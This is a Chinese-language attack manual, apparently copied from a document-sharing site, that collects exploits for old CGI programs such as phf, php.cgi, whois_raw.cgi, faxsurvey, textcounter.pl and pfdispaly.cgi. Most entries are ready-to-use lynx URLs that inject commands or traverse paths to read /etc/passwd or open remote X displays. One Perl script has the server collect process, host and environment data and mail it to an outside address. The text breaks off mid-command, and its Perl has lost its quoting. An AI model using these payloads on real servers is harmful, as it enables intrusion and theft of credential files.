网络程序攻击手册(全篇.docVIP

前一段拜读了小许的《CGI漏洞攻击手册version-0.02》，觉得这种文章的确很重要，但现在的网络程序攻击已不仅仅局限于CGI和pl程序了，所以这回从网上找来了一些常见的asp程序漏洞并加了进来，改名为《网络程序攻击手册》并且修正了原来《CGI漏洞攻击手册version-0.02》那段攻击Count.cgi程序的不完整性，希望对大家有所帮助！ 无用君 一. phf漏洞 这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/etc/passwd: lynx /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd 但是我们还能找到它吗? 二. php.cgi 2.0beta10或更早版本的漏洞 可以读nobody权限的所有文件. lynx /cgi-bin/php.cgi?/etc/passwd php.cgi 2.1版本的只能读shtml文件了. 对于密码文件,同志们要注意一下,也许可能在/etc/master.passwd、/etc/security/passwd等. 三. whois_raw.cgi lynx /cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd lynx /cgi-bin/whois_raw.cgi?fqdn=%0A/usr/X11R6/bin/ xterm%20-display%20:0 四. faxsurvey lynx /cgi-bin/faxsurvey?/bin/cat%20/etc/passwd 五. textcounter.pl 如果服务器上有textcounter.pl,所有人可以以http守护进程的权限执行命令. #!/usr/bin/perl $URL=http://dtp.kappa.ro/a/test.shtml; # please _DO_ _modify_ this $EMAIL=pdoru@pop3.kappa.ro,root; # please _DO_ _modify_ this if ($ARGV[0]) { $CMD=$ARGV[0];}else{ $CMD=(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one; }$text=${URL}/;IFS=\8;${CMD};echo|;$text =~ s/ /\$\{IFS\}/g;#print $text\n; system({wget} wget, $text, -O/dev/null); system({wget} wget, $text, -O/dev/null); #system({lynx} lynx, $text); #如果没有wget命令也可以用lynx #system({lynx} lynx, $text); 六. 一些版本(1.1)的info2www的漏洞 $ REQUEST_METHOD=GET ./info2www (../../../../../../../bin/mail jami $ You have new mail. $ 说实在我不太明白.:( 七. pfdispaly.cgi lynx -source \ /cgi-bin/pfdispaly.cgi?/../../../../etc/motd pfdisplay.cgi还有另外一个漏洞可以执行命令 lynx -dump /cgi-bin/pfdispaly.cgi?%0A/bin/uname%20-a| or lynx -dump \ http://victim/cgi-bin/pfdispaly.cgi?%0A/usr/bin/X11/xclock%20-di